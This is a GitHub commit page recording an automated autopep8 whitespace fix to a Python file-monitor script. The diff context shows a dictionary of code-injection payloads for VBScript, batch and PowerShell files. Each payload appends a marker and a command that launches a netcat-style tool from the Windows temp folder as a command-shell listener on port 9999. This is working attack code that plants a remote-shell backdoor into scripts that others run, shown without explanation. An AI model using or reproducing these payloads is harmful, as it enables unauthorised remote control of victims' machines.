Skip to content

Commit bc364b5

Browse files
style: format code with autopep8
Format code with autopep8 This commit fixes the style issues introduced in 2fa2742 according to the output from Autopep8. Details: None
1 parent 6b5a1c1 commit bc364b5

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

File_Monitor/File_Monitor.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,4 +16,4 @@
1616
'.vbs': ["\r\n'bhpmarker\r\n", f"\r\nCreateObject(\"Wscript.Shell\").Run(\"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\")\r\n"],
1717
'.bat': ["\r\nREM bhpmarker\r\n", "\r\nC:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\r\n"],
1818
'.ps1': ["\r\n#bhpmarker", "Start-Process \"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\""],
19-
}
19+
}

0 commit comments

Comments
 (0)